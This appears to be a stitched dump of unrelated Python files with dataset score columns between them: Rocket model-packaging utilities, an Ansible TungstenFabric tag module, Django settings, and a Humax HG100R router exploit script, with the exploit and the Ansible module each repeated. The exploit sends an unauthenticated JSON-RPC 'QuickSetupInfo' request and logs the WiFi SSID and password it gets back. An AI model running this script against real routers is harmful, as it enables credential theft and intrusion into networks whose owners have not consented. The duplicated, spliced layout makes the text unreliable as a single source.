LIST_ROCKET_FAMILIES = [
'image_object_detection',
'image_human_pose_estimation',
'image_classification',
'image_superresolution',
'image_style_transfer',
'image_segmentation',
'image_instance_segmentation'
]
# --- TAR ARCHIVE ---
def unpack_tar_to_rocket(tar_path: str, rocket_folder_name: str, folder_path: str, remove_after_unpack: bool = True):
"""Unpack a tar archive to a Rocket folder
Unpack a tar archive in a specific folder, rename it and then remove the tar file (or not if the user doesn't want to)
Args:
tar_path (str): path to the tar file containing the Rocket which should be unpacked
rocket_folder_name (str): folder name for the Rocket (to change the one from the tar file)
folder_path (str): folder where the Rocket should be moved once unpacked.
remove_after_unpack (bool, optional): choose to remove the tar file once the Rocket is unpacked. Defaults to True.
Returns:
rocket_folder_path(str): path to the Rocket folder once unpacked.
"""
with tarfile.open(tar_path, 'r') as t:
tar_folder_name = os.path.commonprefix(t.getnames())
t.extractall(folder_path) # unpack in the wrong folder
# Should rename the folder once it is unpacked
rocket_folder_path = os.path.join(folder_path, rocket_folder_name)
os.rename(os.path.join(folder_path, tar_folder_name), rocket_folder_path)
if remove_after_unpack:
os.remove(tar_path)
return rocket_folder_path
def pack_rocket_to_tar(rocket_path: str, rocket_folder_name: str, blueprint: list):
"""Packs a Rocket into a tar archive
Packs a Rocket's contents as described in the blueprint list of files into a tar archive
Args:
rocket_path (str): path to the Rocket folder containing all the files which need to be added in the Rocket.
rocket_folder_name (str): slug of the Rocket without the hash and with underscore (e.g. username_modelName).
blueprint (List[str]): list of all the file in the Rocket's folder that should be included in the tar file.
Notes:
If the filename in the blueprint is a folder, all the files in this folder will be added to the tar file.
Returns:
tar_path (str): path the newly created tar file containing the Rocket.
"""
# Path to the tar file
tar_path = rocket_path + '_ready_for_launch.tar'
with tarfile.open(tar_path, "w") as tar_handle:
for filename in blueprint: # Only add the files in the blueprint
# Add the file and rename it to not put the full path in the tar file
tar_handle.add(
name = os.path.join(rocket_path, filename),
arcname= os.path.join(rocket_folder_name, filename),
)
return tar_path
def get_file_sha1_hash(file_path: str):
"""Compute SHA-1 Hash of a file
Args:
file_path (str): Path to the file we want to compute the hash from.
Returns:
hash (str): SHA-1 hash of the referenced file.
Raises:
RocketHashNotValid: If the computed SHA-1 has a different length from the constant LENGTH_SHA1_HASH.
"""
LENGTH_SHA1_HASH = 40
with open(file_path, 'rb') as f:
buf = f.read()
file_hash = hashlib.sha1(buf).hexdigest()
if len(file_hash) != LENGTH_SHA1_HASH:
raise rocketbase.exceptions.RocketHashNotValid(
'SHA-1 hash computation failed on file: {}'.format(file_path))
return file_hash
# --- ROCKET INFO + CONVERSION ---
def convert_slug_to_dict(rocket_slug: str, parsing_char: str = '/', version_type: str = 'label') -> dict:
"""Convert a Rocket slug to a dictionary.
Convert a Rocket slug of the shape <username>/<modelName/(<hash> or <label>) (e.g. igor/retinanet) to a dictonary with the following structure: {'username': <username>, 'modelName': <name>, '<version_type>': <hash> or <label>}.
All the arguments in the outputted dictionary are String. The <hash> or <label> in the Rocket slug is optional and will not be added to the output dictionary if it is not in the slug.
Args:
rocket_slug (str): The Rocket slug in the shape <username>/<modelName>/(<hash> or <label>). The <hash> and <label> are optional. The <hash> should be complete.
parsing_char (str): The character used to parse the information in the slug.
version_type (str): The key to define the version (either label or hash)
Returns:
rocket_info (dict): A dict containing the information provided in rocket_slug.
Raises:
RocketNotEnoughInfo: If the <username> and/or the <modelName> of the Rocket are missing in the Rocket slug.
"""
# Cast the rocket_slug to a String with lower case
rocket_slug = str(rocket_slug).lower()
# Check if the rocket_slug is not empty
if not rocket_slug:
raise rocketbase.exceptions.RocketNotEnoughInfo(
'Please specify the slug of the Rocket you want to get (e.g. <username>/<modelName>).')
# Parse the Rocket url
rocket_parsed = rocket_slug.split(parsing_char)
if not rocket_parsed:
raise rocketbase.exceptions.RocketNotEnoughInfo(
'\'{}\' is not a correct slug for a Rocket. Please provide more information about the Rocket you want to get (<username>/<modelName>).'.format(rocket_slug))
rocket_username = str(rocket_parsed[0])
rocket_modelName = str(rocket_parsed[1])
rocket_info = {'username': rocket_username, 'modelName': rocket_modelName}
# Check if a specific hash or label has been precised
if len(rocket_parsed) > 2:
rocket_label = parsing_char.join(rocket_parsed[2:])
rocket_info[version_type] = rocket_label
return rocket_info
def get_list_rocket_info_from_folder(folder_path: str) -> list:
"""Get the list of rocket_info from folders name inside of a folder.
Args:
folder_path (str): Path to the folder containing the folders of the Rockets.
Returns:
list_rocket_info (list): List of rocket_info of all the folders of the Rockets in folder_path.
"""
list_folders = [f for f in os.listdir(
folder_path) if not f.startswith('.') and f.count('_') >= 2]
list_rocket_info = [convert_slug_to_dict(
f, '_', 'hash') for f in list_folders]
return list_rocket_info
def convert_dict_to_foldername(rocket_info: dict, separation_char: str = '_', include_hash = True) -> str:
"""Convert a dict containing the information about a Rocket to a folder name.
Args:
rocket_info (dict): Dictionary containing the information about a Rocket.
separation_char (str): Character used to separate the information in the name of the folder.
include_hash (bool): Defautl True. Boolean to include the hash of the Rocket in the folder name.
Returns:
rocket_folder_name (str): Name of the folder containing the Rocket.
Raises:
RocketNotEnoughInfo: If there are not enough information to create the folder name
"""
# List of the information required to create the folder name
list_required_info = [
'username',
'modelName'
]
# If the hash needs to be included, add the hash to the required information
if include_hash:
list_required_info.append('hash')
missing_info = set(list_required_info) - rocket_info.keys()
if missing_info:
raise rocketbase.exceptions.RocketNotEnoughInfo(
'Missing the following information to create the Rocket\'s folder name: ' + ', '.join(missing_info))
info_to_use = [rocket_info['username'], rocket_info['modelName']]
if include_hash:
info_to_use.append(rocket_info['hash'])
rocket_folder_name = str(separation_char).join(info_to_use)
return rocket_folder_name
def import_rocket_info_from_rocket_folder(rocket_folder_path: str, metadata_json_filename: str = 'info.json'):
""" Import the metadata information about a Rocket from its folder.
Import the information in the json file named with <metadata_json_filename> and check the information to see if they corresponds to LIST_REQUIRED_INFO and LIST_ROCKET_FAMILIES.
Args:
rocket_folder_path (str): path to the Rocket's folder
metadata_json_filename (str): name of the .json file containing the metadata information about the Rocket.
Returns:
rocket_info (dict): dictionary containing all the Rocket metadata information.
Raises:
RocketNotEnoughInfo: If there is not enough information in the json file to launch the Rocket.
RocketInfoFormat: If some information about the Rocket are not formatted the right way.
"""
# Path to the file containing the information about the Rocket
metadata_json_path = os.path.join(
rocket_folder_path, metadata_json_filename)
# Load the information from the .json file
with open(metadata_json_path) as info_json:
rocket_info = json.load(info_json)
# -- INFO CHECK --
# Check if some fields are missing
missing_info = set(LIST_REQUIRED_INFO) - rocket_info.keys()
if missing_info:
raise rocketbase.exceptions.RocketNotEnoughInfo(
'Missing some information about the Rocket in the file: ' + metadata_json_path + '. Missing the following information: ' + ', '.join(missing_info))
# Check if some info are empty
list_empty_info = [key for key, item in rocket_info.items() if not isinstance(
item, bool) and not item and key in LIST_REQUIRED_INFO]
if list_empty_info:
raise rocketbase.exceptions.RocketNotEnoughInfo('Missing some information about the Rocket in the file: ' +
metadata_json_path + '. Please provide more information for the following field(s): ' + ', '.join(list_empty_info))
# Check if the username contains a '_'
if '_' in rocket_info['username']:
raise rocketbase.exceptions.RocketInfoFormat(
'In the file \'{}\', the username \'{}\' is not valid. It can\'t contains a \'_\'.'.format(metadata_json_path, rocket_info['username']))
# Check if the modelName contains a '_'
if '_' in rocket_info['modelName']:
raise rocketbase.exceptions.RocketInfoFormat(
'In the file \'{}\', the modelName \'{}\' is not valid. It can\'t contains a \'_\'.'.format(metadata_json_path, rocket_info['modelName']))
# Check if the rocket family is in the list of valid families
if not rocket_info['family'] in LIST_ROCKET_FAMILIES:
raise rocketbase.exceptions.RocketInfoFormat(
'In the file \'{}\', the family \'{}\' is not valid. Please refer to the documentation for a list of valid family names.'.format(metadata_json_path, rocket_info['family']))
# Check if isTrainable is a boolean
if not isinstance(rocket_info['isTrainable'], bool):
raise rocketbase.exceptions.RocketInfoFormat(
'In the file \'{}\',the field isTrainable needs to be a Boolean'.format(
metadata_json_path))
# Check if blueprint is a list
if not isinstance(rocket_info['blueprint'], list):
raise rocketbase.exceptions.RocketInfoFormat(
'In the file \'{}\',the field blueprint needs to be a list of filenames.'.format(
metadata_json_path))
return rocket_info | 0.717309 | 0.312632 |
import requests
import logging
import httplib2
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
class Humax():
def __init__(self, target_list):
self.target_list = target_list
self.findings =[]
def check_host(self, target, port):
"""
Send testing request to server to check if it responds with a 200 to any requests
:param target: string
:param port: string
:return: boolean
"""
url = target+':'+port
test_strings = ['/sjf_hdid','/s_a?jghjf/','/']
response = 0
errors = 0
for test in test_strings:
try:
conn = httplib2.Http(disable_ssl_certificate_validation=True)
if port == '443':
try:
resp, content = conn.request('https://' + url + test, 'GET')
if resp['status'] == '200':
response += 1
except:
pass
else:
resp, content = conn.request('http://' + url + test, 'HEAD')
if resp['status'] == '200':
response += 1
except ConnectionError as e:
errors += 1
logging.debug('Error: '+str(e))
if errors == 3:
logging.debug(R+'Error limit reached for host %s:%s' %(target,port)+W)
return False
elif response == 3:
logging.debug(R+'Ambiguous response from web server on %s:%s. All URIs return status 200' %(target, port)+W)
return False
return True
def run(self):
for target in self.target_list:
ip = target.split(':')[0]
port = target.split(':')[1]
logging.info('Testing: %s:%s' % (ip, port))
if self.check_host(ip,port):
self.exploit(ip, port)
return self.findings
def exploit(self, ip, port):
host = 'http://'+ip+':'+port
path = '/api'
payload = '{"method":"QuickSetupInfo","id":90,"jsonrpc":"2.0"}'
try:
response = requests.post(host + path, data=payload)
response.raise_for_status()
if 'result' not in response.json() or 'WiFi_Info' not in response.json()['result'] or 'wlan' not in \
response.json()['result']['WiFi_Info']:
logging.warning(R+'Error, target may be no exploitable'+W)
return
for wlan in response.json()['result']['WiFi_Info']['wlan']:
result = 'Wifi data found:'+W+'\nSSID: %s' % wlan["ssid"] +'\nPWD: %s' % wlan["password"]
logging.info(G+result+W)
finding = ip + ';' + port + ';' + 'HTTP' + ';' + 'Credentials Disclosure' + ';' + 'Humax' + ';' + result
self.findings.append(finding)
except Exception as e:
logging.warning('Error with host: %s:%s Details: %s'%(ip,port,str(e))) | exploits/Humax_HG100R.py |
import requests
import logging
import httplib2
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
class Humax():
def __init__(self, target_list):
self.target_list = target_list
self.findings =[]
def check_host(self, target, port):
"""
Send testing request to server to check if it responds with a 200 to any requests
:param target: string
:param port: string
:return: boolean
"""
url = target+':'+port
test_strings = ['/sjf_hdid','/s_a?jghjf/','/']
response = 0
errors = 0
for test in test_strings:
try:
conn = httplib2.Http(disable_ssl_certificate_validation=True)
if port == '443':
try:
resp, content = conn.request('https://' + url + test, 'GET')
if resp['status'] == '200':
response += 1
except:
pass
else:
resp, content = conn.request('http://' + url + test, 'HEAD')
if resp['status'] == '200':
response += 1
except ConnectionError as e:
errors += 1
logging.debug('Error: '+str(e))
if errors == 3:
logging.debug(R+'Error limit reached for host %s:%s' %(target,port)+W)
return False
elif response == 3:
logging.debug(R+'Ambiguous response from web server on %s:%s. All URIs return status 200' %(target, port)+W)
return False
return True
def run(self):
for target in self.target_list:
ip = target.split(':')[0]
port = target.split(':')[1]
logging.info('Testing: %s:%s' % (ip, port))
if self.check_host(ip,port):
self.exploit(ip, port)
return self.findings
def exploit(self, ip, port):
host = 'http://'+ip+':'+port
path = '/api'
payload = '{"method":"QuickSetupInfo","id":90,"jsonrpc":"2.0"}'
try:
response = requests.post(host + path, data=payload)
response.raise_for_status()
if 'result' not in response.json() or 'WiFi_Info' not in response.json()['result'] or 'wlan' not in \
response.json()['result']['WiFi_Info']:
logging.warning(R+'Error, target may be no exploitable'+W)
return
for wlan in response.json()['result']['WiFi_Info']['wlan']:
result = 'Wifi data found:'+W+'\nSSID: %s' % wlan["ssid"] +'\nPWD: %s' % wlan["password"]
logging.info(G+result+W)
finding = ip + ';' + port + ';' + 'HTTP' + ';' + 'Credentials Disclosure' + ';' + 'Humax' + ';' + result
self.findings.append(finding)
except Exception as e:
logging.warning('Error with host: %s:%s Details: %s'%(ip,port,str(e))) | 0.253306 | 0.105533 |
# Copyright: (c) 2020, <NAME> <<EMAIL>>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: tag
short_description: create tungstenfabirc tag
version_added: "2.9"
description:
- "create / delete tungstenfabric tag"
options:
name:
description:
- tag name
required: true
controller_ip:
description:
- tungstenfabric controller ip
required: true
project:
description:
- project name (if it is defined, tag will be project scoped tag)
required: false
author:
- <NAME> (@tnaganawa)
'''
EXAMPLES = '''
# Pass in a message
- name: create tag
tungstenfabric.networking.tag:
name: tag1
controller_ip: x.x.x.x
state: present
project: admin
tag_type: label
- name: delete tag
tungstenfabric.networking.tag:
name: tag1
controller_ip: x.x.x.x
state: absent
'''
RETURN = '''
message:
description: The output message that this module generates
type: str
returned: always
'''
import sys
import json
import requests
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.tungstenfabric.networking.plugins.module_utils.common import login_and_check_id, crud
def run_module():
module_args = dict(
name=dict(type='str', required=True),
controller_ip=dict(type='str', required=True),
username=dict(type='str', required=False, default='admin'),
password=dict(type='str', required=False, default='<PASSWORD>'),
state=dict(type='str', required=False, default='present', choices=['absent', 'present']),
uuid=dict(type='str', required=False),
domain=dict(type='str', required=False, default='default-domain'),
project=dict(type='str', required=False),
tag_type=dict(type='str', required=False, default='label', choices=["application", "site", "deployment", "tier", "label"])
)
result = dict(
changed=False,
message=''
)
required_if_args = [
["state", "present", ["tag_type"]]
]
module = AnsibleModule(
argument_spec=module_args,
supports_check_mode=True,
required_if=required_if_args
)
name = module.params.get("name")
controller_ip = module.params.get("controller_ip")
username = module.params.get("username")
password = <PASSWORD>("password")
state = module.params.get("state")
domain = module.params.get("domain")
project = module.params.get("project")
tag_type = module.params.get("tag_type")
if module.check_mode:
module.exit_json(**result)
obj_type='tag'
tag_type_name = tag_type + '=' + name
(web_api, update, uuid, js) = login_and_check_id(module, tag_type_name, obj_type, controller_ip, username, password, state, domain=domain, project=project)
if update and state=='present':
pass
else:
## create payload and call API
if project:
js=json.loads (
'''
{ "tag":
{
"fq_name": ["%s", "%s", "%s"],
"tag_type_name": "%s",
"tag_value": "%s",
"parent_type": "project"
}
}
''' % (domain, project, name, tag_type, name)
)
else:
js=json.loads (
'''
{ "tag":
{
"fq_name": ["%s"],
"tag_type_name": "%s",
"tag_value": "%s"
}
}
''' % (name, tag_type, name)
)
## begin: object specific
## end: object specific
payload=json.dumps(js)
failed = crud (web_api, controller_ip, update, state, result, payload=payload, obj_type=obj_type, uuid=uuid)
if failed:
module.fail_json(msg='failure message', **result)
module.exit_json(**result)
def main():
run_module()
if __name__ == '__main__':
main() | plugins/modules/tag.py |
# Copyright: (c) 2020, <NAME> <<EMAIL>>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: tag
short_description: create tungstenfabirc tag
version_added: "2.9"
description:
- "create / delete tungstenfabric tag"
options:
name:
description:
- tag name
required: true
controller_ip:
description:
- tungstenfabric controller ip
required: true
project:
description:
- project name (if it is defined, tag will be project scoped tag)
required: false
author:
- <NAME> (@tnaganawa)
'''
EXAMPLES = '''
# Pass in a message
- name: create tag
tungstenfabric.networking.tag:
name: tag1
controller_ip: x.x.x.x
state: present
project: admin
tag_type: label
- name: delete tag
tungstenfabric.networking.tag:
name: tag1
controller_ip: x.x.x.x
state: absent
'''
RETURN = '''
message:
description: The output message that this module generates
type: str
returned: always
'''
import sys
import json
import requests
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.tungstenfabric.networking.plugins.module_utils.common import login_and_check_id, crud
def run_module():
module_args = dict(
name=dict(type='str', required=True),
controller_ip=dict(type='str', required=True),
username=dict(type='str', required=False, default='admin'),
password=dict(type='str', required=False, default='<PASSWORD>'),
state=dict(type='str', required=False, default='present', choices=['absent', 'present']),
uuid=dict(type='str', required=False),
domain=dict(type='str', required=False, default='default-domain'),
project=dict(type='str', required=False),
tag_type=dict(type='str', required=False, default='label', choices=["application", "site", "deployment", "tier", "label"])
)
result = dict(
changed=False,
message=''
)
required_if_args = [
["state", "present", ["tag_type"]]
]
module = AnsibleModule(
argument_spec=module_args,
supports_check_mode=True,
required_if=required_if_args
)
name = module.params.get("name")
controller_ip = module.params.get("controller_ip")
username = module.params.get("username")
password = <PASSWORD>("password")
state = module.params.get("state")
domain = module.params.get("domain")
project = module.params.get("project")
tag_type = module.params.get("tag_type")
if module.check_mode:
module.exit_json(**result)
obj_type='tag'
tag_type_name = tag_type + '=' + name
(web_api, update, uuid, js) = login_and_check_id(module, tag_type_name, obj_type, controller_ip, username, password, state, domain=domain, project=project)
if update and state=='present':
pass
else:
## create payload and call API
if project:
js=json.loads (
'''
{ "tag":
{
"fq_name": ["%s", "%s", "%s"],
"tag_type_name": "%s",
"tag_value": "%s",
"parent_type": "project"
}
}
''' % (domain, project, name, tag_type, name)
)
else:
js=json.loads (
'''
{ "tag":
{
"fq_name": ["%s"],
"tag_type_name": "%s",
"tag_value": "%s"
}
}
''' % (name, tag_type, name)
)
## begin: object specific
## end: object specific
payload=json.dumps(js)
failed = crud (web_api, controller_ip, update, state, result, payload=payload, obj_type=obj_type, uuid=uuid)
if failed:
module.fail_json(msg='failure message', **result)
module.exit_json(**result)
def main():
run_module()
if __name__ == '__main__':
main() | 0.464902 | 0.16975 |
import os
from typing import Dict, Any
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(
os.path.dirname(os.path.abspath(os.path.join(__file__, "../")))
)
SHARED_URL = "https://shared.acdh.oeaw.ac.at/"
ACDH_IMPRINT_URL = "https://shared.acdh.oeaw.ac.at/acdh-common-assets/api/imprint.php?serviceID="
PROJECT_NAME = "apis"
PROJECT_SHARED = "https://shared.acdh.oeaw.ac.at/apis/"
PROJECT_DEFAULT_MD = {
'title': 'TITLE',
'author': '<NAME>, <NAME>',
'subtitle': 'SUBTITLE',
'description': """This is a default metadata file. To change this, provide\
provide a following file {PROJECT_SHARED}/{PROJECT_NAME}/metadata.json""",
'github': 'https://github.com/acdh-oeaw/apis-webpage-base',
'production instance': None,
'purpose_de': '',
'purpose_en': """""",
'version': ['apis_core', 'charts', 'django'],
'matomo_id': '',
'matomo_url': '',
'imprint': '/imprint',
'social_media': [
('fab fa-twitter', 'https://twitter.com/ACDH_OeAW'),
('fab fa-youtube', 'https://www.youtube.com/channel/UCgaEMaMbPkULYRI5u6gvG-w'),
],
'social_media': [
('fab fa-twitter fa-2x', 'https://twitter.com/ACDH_OeAW'),
('fab fa-youtube fa-2x', 'https://www.youtube.com/channel/UCgaEMaMbPkULYRI5u6gvG-w'),
],
'app_type': 'database',
}
# Application definition
INSTALLED_APPS = [
"dal",
# 'corsheaders',
"dal_select2",
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"reversion",
"reversion_compare",
"crispy_forms",
"django_filters",
"django_tables2",
"rest_framework",
"webpage",
"browsing",
"apis_core.apis_entities",
"apis_core.apis_metainfo",
"apis_core.apis_relations",
"apis_core.apis_vocabularies",
"apis_core.apis_labels",
"apis_core.apis_tei",
# 'apis_core.apis_vis',
"rest_framework.authtoken",
#"drf_yasg",
"drf_spectacular",
"guardian",
"charts",
"infos",
"csvexport"
]
USE_X_FORWARDED_HOST = True
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
CORS_ORIGIN_ALLOW_ALL = True
CORS_ALLOW_CREDENTIALS = True
CORS_ALLOW_METHODS = ("GET", "OPTIONS")
SPECTACULAR_SETTINGS: Dict[str, Any] = {
'TITLE': 'APIS generic API',
'DESCRIPTIOPN': 'Provides access to the main APIS data-model endpoints.',
'LICENSE': {'name': 'MIT License', 'url': 'https://www.mit.edu/~amini/LICENSE.md'},
'VERSION': '0.13'
}
CRISPY_TEMPLATE_PACK = "bootstrap3"
REST_FRAMEWORK = {
"DEFAULT_PAGINATION_CLASS": "rest_framework.pagination.LimitOffsetPagination",
"PAGE_SIZE": 50,
"DEFAULT_PERMISSION_CLASSES": (
#"rest_framework.permissions.DjangoModelPermissions",
#"rest_framework.permissions.IsAuthenticated",
"rest_framework.permissions.DjangoObjectPermissions",
# use IsAuthenticated for every logged in user to have global edit rights
),
"DEFAULT_AUTHENTICATION_CLASSES": (
"rest_framework.authentication.TokenAuthentication",
"rest_framework.authentication.SessionAuthentication",
"rest_framework.authentication.BasicAuthentication",
),
'DEFAULT_FILTER_BACKENDS': (
'django_filters.rest_framework.DjangoFilterBackend',
'drf_spectacular.contrib.django_filters.DjangoFilterBackend'
),
'DEFAULT_SCHEMA_CLASS': 'drf_spectacular.openapi.AutoSchema',
}
AUTHENTICATION_BACKENDS = (
"django.contrib.auth.backends.ModelBackend", # this is default
"guardian.backends.ObjectPermissionBackend",
)
MIDDLEWARE = [
"corsheaders.middleware.CorsMiddleware",
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
"reversion.middleware.RevisionMiddleware",
"crum.CurrentRequestUserMiddleware",
]
ROOT_URLCONF = "apis.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
"webpage.webpage_content_processors.installed_apps",
"webpage.webpage_content_processors.is_dev_version",
"webpage.webpage_content_processors.get_db_name",
"webpage.webpage_content_processors.title_img",
"webpage.webpage_content_processors.logo_img",
"webpage.webpage_content_processors.custom_css",
"webpage.webpage_content_processors.shared_url",
"webpage.webpage_content_processors.apis_app_name",
"apis_core.context_processors.custom_context_processors.add_entities",
"apis_core.context_processors.custom_context_processors.add_relations",
"apis_core.context_processors.custom_context_processors.add_apis_settings",
]
},
}
]
WSGI_APPLICATION = "apis.wsgi.application"
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator"
},
{"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator"},
{"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator"},
{"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator"},
]
APIS_BASE_URI = "TO CHANGE"
APIS_MIN_CHAR = 0
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = "en"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles/")
STATIC_URL = "/static/"
MEDIA_ROOT = os.path.join(BASE_DIR, "media/")
MEDIA_URL = "/media/"
DJANGO_TABLES2_TEMPLATE = "django_tables2/bootstrap4.html"
APIS_COMPONENTS = []
# APIS settings
APIS_TEI_TEXTS = ["xml/tei transcription"]
APIS_CETEICEAN_CSS = "https://teic.github.io/CETEIcean/css/CETEIcean.css"
APIS_CETEICEAN_JS = "https://teic.github.io/CETEIcean/js/CETEI.js"
APIS_NEXT_PREV = True
APIS_ALTERNATE_NAMES = [
"Taufname",
"Ehename",
"Name laut ÖBL XML",
"alternative Namensform",
"alternative name",
"Künstlername",
"Mädchenname",
"Pseudonym",
"weitere Namensform",
]
APIS_RELATIONS_FILTER_EXCLUDE = [
"uri",
"tempentityclass",
"user",
"__id",
"source",
"label",
"temp_entity",
"collection__",
"_ptr",
"baseclass",
"id",
"written",
"relation_type__description",
"relation_type__parent_class",
"relation_type__status",
"relation_type__vocab_name",
"relation_type__name_reverse",
"__text",
"annotation_set_relation",
]
APIS_RELATIONS = {
"list_filters": [("relation_type",)],
"search": ["relation_type__name"],
"exclude": ["name"],
"PersonPlace": {
"labels": ["related_person", "related_place", "relation_type"],
"search": [
"relation_type__name",
"related_person__name",
"related_person__first_name",
"related_place__name",
],
"list_filters": [("relation_type",), ("related_person",), ("related_place",)],
},
"PersonInstitution": {
"labels": ["related_person", "related_institution", "relation_type"],
"search": [
"relation_type__name",
"related_person__name",
"related_person__first_name",
"related_institution__name",
],
"list_filters": [
("relation_type",),
("related_person",),
("related_institution",),
],
},
"PersonEvent": {
"labels": ["related_person", "related_event", "relation_type"],
"search": [
"relation_type__name",
"related_person__name",
"related_person__first_name",
"related_event__name",
],
"list_filters": [("relation_type",), ("related_person",), ("related_event",)],
},
"PersonWork": {
"labels": ["related_person", "related_work", "relation_type"],
"search": [
"relation_type__name",
"related_person__name",
"related_person__first_name",
"related_work__name",
],
"list_filters": [("relation_type",), ("related_person",), ("related_work",)],
},
"PersonPerson": {
"labels": ["related_personA", "related_personB", "relation_type"],
"search": [
"relation_type__name",
"related_personA__name",
"related_personA__first_name",
"related_personB__name",
"related_personB__first_name",
],
"list_filters": [
("relation_type",),
("related_personA",),
("related_personB",),
],
},
"InstitutionPlace": {
"labels": ["related_institution", "related_place", "relation_type"],
"search": [
"relation_type__name",
"related_institution__name",
"related_place__name",
],
"list_filters": [
("relation_type",),
("related_institution",),
("related_place",),
],
},
"InstitutionWork": {
"labels": ["related_institution", "related_work", "relation_type"],
"search": [
"relation_type__name",
"related_institution__name",
"related_work__name",
],
"list_filters": [
("relation_type",),
("related_institution",),
("related_work",),
],
},
"InstitutionEvent": {
"labels": ["related_institution", "related_event", "relation_type"],
"search": [
"relation_type__name",
"related_institution__name",
"related_event__name",
],
"list_filters": [
("relation_type",),
("related_institution",),
("related_event",),
],
},
"InstitutionInstitution": {
"labels": ["related_institutionA", "related_institutionB", "relation_type"],
"search": [
"relation_type__name",
"related_institutionA__name",
"related_institutionB__name",
],
"list_filters": [
("relation_type",),
("related_institutionA",),
("related_institutionB",),
],
},
"PlaceWork": {
"labels": ["related_work", "related_place", "relation_type"],
"search": ["relation_type__name", "related_place__name", "related_work__name"],
"list_filters": [("relation_type",), ("related_place",), ("related_work",)],
},
"PlaceEvent": {
"labels": ["related_event", "related_place", "relation_type"],
"search": ["relation_type__name", "related_place__name", "related_event__name"],
"list_filters": [("relation_type",), ("related_place",), ("related_event",)],
},
"PlacePlace": {
"labels": ["related_placeA", "related_placeB", "relation_type"],
"search": [
"relation_type__name",
"related_placeA__name",
"related_placeB__name",
],
"list_filters": [("relation_type",), ("related_placeA",), ("related_placeB",)],
},
"EventWork": {
"labels": ["related_event", "related_work", "relation_type"],
"search": ["relation_type__name", "related_event__name", "related_work__name"],
"list_filters": [("relation_type",), ("related_event",), ("related_work",)],
},
"EventEvent": {
"labels": ["related_eventA", "related_eventB", "relation_type"],
"search": [
"relation_type__name",
"related_eventA__name",
"related_eventB__name",
],
"list_filters": [("relation_type",), ("related_eventA",), ("related_eventB",)],
},
"WorkWork": {
"labels": ["related_workA", "related_workB", "relation_type"],
"search": ["relation_type__name", "related_workA__name", "related_workB__name"],
"list_filters": [("relation_type",), ("related_workA",), ("related_workB",)],
},
}
APIS_VOCABULARIES = {"exclude": ["userAdded"]}
APIS_METAINFO = {"exclude": ["groups_allowed"]}
APIS_ENTITIES = {
"Place": {
"merge": True,
"search": ["name"],
"form_order": ["name", "kind", "lat", "lng", "status", "collection"],
"table_fields": ["name"],
"additional_cols": ["id", "lat", "lng", "part_of"],
"list_filters": [
{"name": {"method": "name_label_filter"}},
{"collection": {"label": "Collection"}},
{"kind": {"label": "Kind of Place"}},
"related_entity_name",
"related_relationtype_name",
"lat",
"lng",
],
},
"Person": {
"merge": True,
"search": ["name", "first_name"],
"form_order": ["first_name", "name", "start_date_written", "end_date_written", "profession", "status", "collection"],
"table_fields": ["name", "first_name", "start_date_written", "end_date_written"],
"additional_cols": ["id", "profession", "gender"],
"list_filters": [
"name",
{"gender": {"label": "Gender"}},
{"start_date": {"label": "Date of Birth"}},
{"end_date": {"label": "Date of Death"}},
{"profession": {"label": "Profession"}},
{"title": {"label": "Title"}},
{"collection": {"label": "Collection"}},
"related_entity_name",
"related_relationtype_name",
],
},
"Institution": {
"merge": True,
"search": ["name"],
"form_order": ["name", "start_date_written", "end_date_written", "kind", "status", "collection"],
"additional_cols": ["id", "kind", ],
"list_filters": [
{"name": {"label": "Name or label of institution"}},
{"kind": {"label": "Kind of Institution"}},
{"start_date": {"label": "Date of foundation"}},
{"end_date": {"label": "Date of termination"}},
{"collection": {"label": "Collection"}},
"related_entity_name",
"related_relationtype_name",
],
},
"Work": {
"merge": True,
"search": ["name"],
"additional_cols": ["id", "kind", ],
"list_filters": [
{"name": {"label": "Name of work"}},
{"kind": {"label": "Kind of Work"}},
{"start_date": {"label": "Date of creation"}},
{"collection": {"label": "Collection"}},
"related_entity_name",
"related_relationtype_name",
],
},
"Event": {
"merge": True,
"search": ["name"],
"additional_cols": ["id", ],
"list_filters": [
{"name": {"label": "Name of event"}},
{"kind": {"label": "Kind of Event"}},
{"start_date": {"label": "Date of beginning"}},
{"end_date": {"label": "Date of end"}},
{"collection": {"label": "Collection"}},
"related_entity_name",
"related_relationtype_name",
],
},
}
